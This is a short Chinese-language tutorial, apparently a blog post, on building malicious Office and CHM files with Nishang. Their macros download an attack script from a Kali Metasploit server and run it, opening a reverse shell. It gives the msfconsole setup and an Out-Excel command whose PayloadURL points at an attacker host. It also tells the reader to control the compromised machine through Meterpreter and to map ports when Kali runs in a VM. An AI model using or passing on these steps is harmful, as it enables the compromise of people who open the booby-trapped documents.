需要准备:
原理:
nishang生成带有攻击脚本的excel和word或者chm,利用宏或者chm中的漏洞创建进程获取kali服务器上的攻击脚本,并下载到本地执行,从而反弹回一个shell
缺点: 只有启用宏的office才能攻击成功,chm因为调用cmd带弹窗。
步骤:
在终端中启动msf框架依赖度的服务
1 | service postgresql start |
打开msf终端 ,配置攻击模块
1 | msfconsole |
如果kali在虚拟机里,记得将端口映射到宿主机。
2.nishang生成excel
将Client目录下的Out-Excel.ps1解压出来,用powershell执行1
2..\ Out-Excel.ps1
Out-Excel -PayloadURL https://192.168.187.140:8080/ -OutputFile D:\temp\test.xls
其中https://192.168.187.140:8080/是msf开启的服务地址,端口改为映射出来的端口。
具体怎么利用,chm可以利用easychm将其复制到相应的chm文件中,实现自己构造chm。
建立会话session之后,即可以调用meterpreter命令进行操纵肉鸡。